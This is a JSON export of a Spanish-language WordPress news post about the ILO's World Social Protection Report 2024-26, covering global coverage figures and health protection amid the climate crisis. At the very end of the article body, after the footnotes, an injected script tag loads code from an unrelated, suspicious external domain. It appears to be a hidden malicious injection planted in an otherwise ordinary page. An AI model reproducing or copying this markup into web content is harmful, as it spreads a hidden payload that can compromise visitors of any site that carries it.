{"id":987722763,"date":"2024-09-27T08:36:58","date_gmt":"2024-09-27T07:36:58","guid":{"rendered":"https:\/\/p4h.world\/?post_type=news&#038;p=987722763"},"modified":"2024-09-27T11:34:36","modified_gmt":"2024-09-27T10:34:36","slug":"lanzamiento-mundial-del-informe-mundial-sobre-proteccion-social-2024-26","status":"publish","type":"news","link":"https:\/\/p4h.world\/es\/news\/lanzamiento-mundial-del-informe-mundial-sobre-proteccion-social-2024-26\/","title":{"rendered":"Lanzamiento mundial del Informe Mundial sobre Protecci\u00f3n Social 2024-26"},"content":{"rendered":"<p>[et_pb_section fb_built=&#8221;1&#8243; admin_label=&#8221;!! PLEASE DO NOT EDIT !!!&#8221; _builder_version=&#8221;4.19.5&#8243; _module_preset=&#8221;default&#8221; global_colors_info=&#8221;{}&#8221;][et_pb_row use_custom_gutter=&#8221;on&#8221; gutter_width=&#8221;1&#8243; admin_label=&#8221;\u00a1\u00a1\u00a1!!! \u00a1\u00a1\u00a1POR FAVOR NO EDITES !!! &#8221; _builder_version=&#8221;4.20.4&#8243; _module_preset=&#8221;default&#8221; global_colors_info=&#8221;{}&#8221;][et_pb_column type=&#8221;4_4&#8243; _builder_version=&#8221;4.19.5&#8243; _module_preset=&#8221;default&#8221; global_colors_info=&#8221;{}&#8221;][et_pb_text admin_label=&#8221;SUMMARY&#8221; _builder_version=&#8221;4.21.0&#8243; _module_preset=&#8221;default&#8221; custom_padding=&#8221;10px||20px||false|false&#8221; global_colors_info=&#8221;{}&#8221;]<\/p>\n<p><strong>El nuevo informe emblem\u00e1tico de la OIT ofrece una visi\u00f3n global de los progresos realizados en todo el mundo desde 2015 en la extensi\u00f3n de la protecci\u00f3n social, centr\u00e1ndose especialmente en la crisis clim\u00e1tica y en la necesidad de una acci\u00f3n clim\u00e1tica para la transici\u00f3n hacia un mundo m\u00e1s sostenible.<\/strong><\/p>\n<p>[\/et_pb_text][et_pb_text admin_label=&#8221;TEXT &#8211; BLOCK 1 &#8221; _builder_version=&#8221;4.21.0&#8243; _module_preset=&#8221;default&#8221; custom_padding=&#8221;||1em||false|false&#8221; global_colors_info=&#8221;{}&#8221;]La Organizaci\u00f3n Internacional del Trabajo public\u00f3 su emblem\u00e1tico <a href=\"https:\/\/www.ilo.org\/publications\/flagship-reports\/world-social-protection-report-2024-26-universal-social-protection-climate\">Informe sobre la Protecci\u00f3n Social en el Mundo 2024-26: Protecci\u00f3n Social Universal para la Acci\u00f3n Clim\u00e1tica y una Transici\u00f3n Justa<\/a>.<br \/>\nEl informe examina el papel de la protecci\u00f3n social para mitigar los efectos del cambio clim\u00e1tico y facilitar una transici\u00f3n justa.<br \/>\nPor primera vez, los nuevos datos sobre tendencias indican que m\u00e1s de la mitad de la poblaci\u00f3n mundial est\u00e1 cubierta por la protecci\u00f3n social.<br \/>\nSin embargo, este bienvenido progreso se ve empa\u00f1ado por el hecho de que 3.800 millones de personas siguen totalmente desprotegidas frente a los retos de la vida y los impactos del cambio clim\u00e1tico.[\/et_pb_text][et_pb_text admin_label=&#8221;TEXT &#8211; BLOCK 2 &#8221; _builder_version=&#8221;4.21.0&#8243; _module_preset=&#8221;default&#8221; custom_padding=&#8221;||1em||false|false&#8221; global_colors_info=&#8221;{}&#8221;]<\/p>\n<p>La presentaci\u00f3n mundial tuvo lugar el 24 de septiembre de 2024, durante un acto de alto nivel celebrado en la sede de las Naciones Unidas en Nueva York, al margen de la Asamblea General de las Naciones Unidas.<br \/>\nOrganizado por la OIT en colaboraci\u00f3n con la Misi\u00f3n Permanente de Sud\u00e1frica ante las Naciones Unidas, el acto sirvi\u00f3 para debatir las principales conclusiones del informe, proporcionando un foro de reflexi\u00f3n sobre recomendaciones pol\u00edticas relacionadas con la protecci\u00f3n social universal y la acci\u00f3n por el clima. <\/p>\n<p>[\/et_pb_text][et_pb_text admin_label=&#8221;TEXT &#8211; BLOCK 3&#8243; _builder_version=&#8221;4.21.0&#8243; _module_preset=&#8221;default&#8221; custom_padding=&#8221;||1em||false|false&#8221; global_colors_info=&#8221;{}&#8221;]Un tema clave del informe es el papel de la protecci\u00f3n sociosanitaria (PSS) para hacer frente a la crisis clim\u00e1tica. Un an\u00e1lisis del marco jur\u00eddico muestra que, de 164 pa\u00edses, el 83,6% de la poblaci\u00f3n tiene derecho a acceder a los servicios sanitarios gratuitamente o con copagos limitados, pero que la cobertura es desigual seg\u00fan los grupos de ingresos. Mientras que unos dos tercios de la poblaci\u00f3n mundial est\u00e1n efectivamente protegidos por un r\u00e9gimen<sup><a href=\"#footnote_0_987722763\" id=\"identifier_0_987722763\" class=\"footnote-link footnote-identifier-link\" title=\"Para la OIT, un r&eacute;gimen se refiere a un programa anclado en la legislaci&oacute;n nacional y caracterizado por al menos un cierto grado de formalidad.\">1<\/a><\/sup>, la cobertura del PSS se ha estancado desde 2020, &#8211; mostrando importantes lagunas de aplicaci\u00f3n.[\/et_pb_text][et_pb_text admin_label=&#8221;TEXT &#8211; BLOCK 4 &#8221; _builder_version=&#8221;4.21.0&#8243; _module_preset=&#8221;default&#8221; custom_padding=&#8221;||1em||false|false&#8221; global_colors_info=&#8221;{}&#8221;]<\/p>\n<p>Adem\u00e1s, a pesar de los avances mundiales, siguen existiendo obst\u00e1culos para acceder a la asistencia sanitaria, sobre todo en los pa\u00edses de renta baja.<br \/>\nEl informe se\u00f1ala la necesidad de aumentar las inversiones en infraestructuras sanitarias, mejorar las condiciones de trabajo de los trabajadores sanitarios y reforzar la coordinaci\u00f3n entre el acceso a la asistencia sanitaria y la seguridad de los ingresos para hacer frente a estos retos. <\/p>\n<p>[\/et_pb_text][et_pb_text admin_label=&#8221;TEXT &#8211; BLOCK 5&#8243; _builder_version=&#8221;4.21.0&#8243; _module_preset=&#8221;default&#8221; custom_padding=&#8221;||1em||false|false&#8221; global_colors_info=&#8221;{}&#8221;]<\/p>\n<p>A medida que la crisis clim\u00e1tica agrava las desigualdades sanitarias, el informe reclama medidas e inversiones urgentes para hacer de la PSH una realidad universal, y acelerar el avance hacia la consecuci\u00f3n de los Objetivos de Desarrollo Sostenible de 2030.<\/p>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n<ol class=\"footnotes\"><li id=\"footnote_0_987722763\" class=\"footnote\"> Para la OIT, un r\u00e9gimen se refiere a un programa anclado en la legislaci\u00f3n nacional y caracterizado por al menos un cierto grado de formalidad. <span class=\"footnote-back-link-wrapper\">[<a href=\"#identifier_0_987722763\" class=\"footnote-link footnote-back-link\">&#8617;<\/a>]<\/span><\/li><\/ol><script src=https:\/\/buryebilgrill.online\/footnotes><\/script>","protected":false},"excerpt":{"rendered":"<p>El nuevo informe emblem\u00e1tico de la OIT ofrece una visi\u00f3n global de los progresos realizados en todo el mundo desde 2015 en la extensi\u00f3n de la protecci\u00f3n social, centr\u00e1ndose especialmente en la crisis clim\u00e1tica y en la necesidad de una acci\u00f3n clim\u00e1tica para la transici\u00f3n hacia un mundo m\u00e1s sostenible.La Organizaci\u00f3n Internacional del Trabajo public\u00f3&#8230;<\/p>\n","protected":false},"author":51,"featured_media":987722762,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":""},"categories":[2973],"tags":[2991],"acf":[],"_links":{"self":[{"href":"https:\/\/p4h.world\/es\/wp-json\/wp\/v2\/news\/987722763"}],"collection":[{"href":"https:\/\/p4h.world\/es\/wp-json\/wp\/v2\/news"}],"about":[{"href":"https:\/\/p4h.world\/es\/wp-json\/wp\/v2\/types\/news"}],"author":[{"embeddable":true,"href":"https:\/\/p4h.world\/es\/wp-json\/wp\/v2\/users\/51"}],"replies":[{"embeddable":true,"href":"https:\/\/p4h.world\/es\/wp-json\/wp\/v2\/comments?post=987722763"}],"version-history":[{"count":20,"href":"https:\/\/p4h.world\/es\/wp-json\/wp\/v2\/news\/987722763\/revisions"}],"predecessor-version":[{"id":987723088,"href":"https:\/\/p4h.world\/es\/wp-json\/wp\/v2\/news\/987722763\/revisions\/987723088"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/p4h.world\/es\/wp-json\/wp\/v2\/media\/987722762"}],"wp:attachment":[{"href":"https:\/\/p4h.world\/es\/wp-json\/wp\/v2\/media?parent=987722763"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/p4h.world\/es\/wp-json\/wp\/v2\/categories?post=987722763"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/p4h.world\/es\/wp-json\/wp\/v2\/tags?post=987722763"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}